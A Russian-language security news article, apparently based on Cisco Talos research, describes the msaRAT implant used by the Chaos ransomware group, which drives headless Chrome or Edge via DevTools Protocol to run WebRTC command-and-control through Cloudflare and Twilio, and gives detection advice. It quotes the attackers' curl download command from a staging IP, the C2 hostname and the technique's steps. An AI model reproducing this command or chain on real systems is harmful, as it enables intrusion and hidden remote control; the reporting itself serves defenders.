Группа Chaos ransomware использовала браузер самой жертвы как транспорт для command-and-control: вредонос не ходил наружу от своего имени, а запускал headless Chrome или Edge и отправлял команды через WebRTC. Для российских команд ИБ и админов это неприятная новость: на сети такой трафик выглядит не как «малварь стучится на подозрительный IP», а как вполне обычный браузер, разговаривающий с Cloudflare и Twilio.
Схему разобрала Cisco Talos, о чем сообщает The Hacker News. Исследователи описали имплант msaRAT, найденный на скомпрометированной Windows-машине до запуска шифровальщика. Деталь, которая делает историю интересной не только для threat intel, но и для практиков: процесс msaRAT сам по себе общается только с 127.0.0.1 и не открывает собственных внешних соединений. С точки зрения части EDR и сетевого мониторинга это уже не классический RAT, а довольно неприятная подмена ролей, где «говорит» браузер.
Технически цепочка выглядит так. msaRAT ищет Chrome или Edge сначала через переменные окружения, затем, если нужно, через реестр Windows для Chrome. Найдя браузер, он запускает его с параметрами --headless=new, --remote-debugging-port и отдельным --user-data-dir. Дальше имплант использует Chrome DevTools Protocol, то есть штатный интерфейс отладки браузера. Он получает debuggable target через /json/list/, подключается по WebSocket, создает вкладку, отключает Content Security Policy командой Page.setBypassCSP, регистрирует пять callback-функций через Runtime.addBinding и инжектит JavaScript из секции .rdata бинаря. Четыре имени этих callback — msaOpen, msaClose, msaError и msaMessage — и дали образцу имя msaRAT.
Дальше начинается самое показательное. Инжектированный код получает STUN/TURN-конфигурацию с Cloudflare Worker по адресу is-01-ast[.]ols-img-12[.]workers[.]dev, причем маскирует Origin и Referer под трафик с сайта Microsoft. Затем браузер поднимает peer connection и отправляет SDP offer на тот же endpoint. В ответ приходит SDP без ICE-кандидатов, а адрес соединения указан как 0.0.0.0, то есть прямой peer-to-peer не складывается и весь канал уходит через TURN-релей global.turn.twilio.com. После установления data channel Cloudflare Worker выходит из тракта, а дальнейший обмен идет уже внутри WebRTC-канала. Снаружи защитник видит браузер, который обращается к Cloudflare и Twilio. Адрес атакующего сервера в трафике не появляется вообще.
Шифрование там тоже не для галочки. Снаружи канал закрывает DTLS, а внутри исследователи увидели еще один слой на основе ChaCha-Poly1305 с ключом, полученным через ECDH-обмен. Он стартует с кадра handshake типа 0xFE, который приходит от C2 сразу после подключения. Команды затем передаются в cmd.exe /e:ON /v:OFF /d /c на исполнение. По наблюдениям Talos, очередь отправки и логика flow control выглядят так, будто авторы рассчитывали не только на короткие команды, но и на передачу более тяжелых данных, например скриншотов или файлов. Иными словами, это не «одноразовый загрузчик», а транспорт, задуманный под более плотную посткомпрометирующую работу.
Вектор доставки при этом до обидного прозаичен. Talos не уточняет, как именно был взломан конкретный хост, но для группы Chaos уже описывали набор из spam floods, vishing, Quick Assist и RMM-инструментов для закрепления. Сам msaRAT загружался одной командой: curl.exe https://172.86.126[.]18:443/update_ms.msi -o C:programdataupdate_ms.msi. При этом, как подчеркивают исследователи, на порту 443 использовался обычный HTTP, а не HTTPS. Это отдельный привет политикам, где фильтрация по принципу «443 значит можно». MSI-пакет маскировался под обновление Windows, а custom action в конце установки загружал встроенную DLL прямо в память. Эта DLL и была msaRAT: написана на Rust, использует Tokio и экспортирует функцию RUN, которую вызывает инсталлятор.
На более широком фоне история хорошо ложится в тренд 2025-2026 годов. Отдельно ни WebRTC, ни TURN-инфраструктура для C2 уже не выглядят чем-то невиданным. Praetorian еще в августе 2025 года показывала, что TURN-серверы платформ для конференций можно использовать как полноценный C2-канал. В марте 2026-го Sansec находила скиммер, который уводил украденные карточные данные через WebRTC data channels в обход HTTP-инспекции. Но в случае Chaos ransomware эта идея аккуратно упакована в Rust-имплант, который не строит собственную сетевую активность, а заставляет это делать легитимный браузер через штатный API отладки. Для SOC это плохая новость еще и потому, что блокировать домен workers.dev целиком или TURN-сервис Twilio на уровне всей организации часто нереалистично: сломаете законные сценарии быстрее, чем поймаете злоумышленника.
Практический вывод здесь не про патчи браузеров. Talos прямо пишет: msaRAT не опирается на уязвимость в Chrome или Edge, так что «закрыть дыру апдейтом» не получится. Искать нужно поведение. Подозрительный сценарий — Chrome или Edge, запущенный не пользователем, а инсталлятором, сервисом или другим неинтерактивным родителем, да еще и с флагами --headless=new и --remote-debugging-port. Следом стоит смотреть корреляцию с loopback-трафиком на порт отладки и исходящим WebRTC. Если телеметрия видит сообщения CDP, полезные опорные точки — Runtime.addBinding и Runtime.evaluate. На 23 июля 2026 года Talos не публиковала хэши файлов msaRAT; в открытом наборе индикаторов были только staging IP и hostname Cloudflare Worker. Есть и сигнатуры: ClamAV Win.Downloader.ChaosRaas-10060321-0, а также правила Snort 2 1:66839, 1:66840, 1:66841 и Snort 3 1:66839, 1:301587. Полезно, но иллюзий тут быть не должно: IP и Worker меняются быстро, а вот браузер, поднятый инсталлятором в headless-режиме ради C2, уже гораздо более устойчивый признак техники.
Главный вопрос теперь не в том, перейдут ли другие операторы шифровальщиков на похожую схему, а в том, насколько быстро защитные команды перестанут считать браузер «по умолчанию доверенным» процессом. Пока многие контуры мониторинга заточены на поиск подозрительных бинарей и плохих доменов, злоумышленники все охотнее арендуют доверие у штатных инструментов системы. В этой логике Chrome, Edge и DevTools Protocol начинают выглядеть не как удобство для разработчиков, а как еще одна поверхность для охоты и детекта.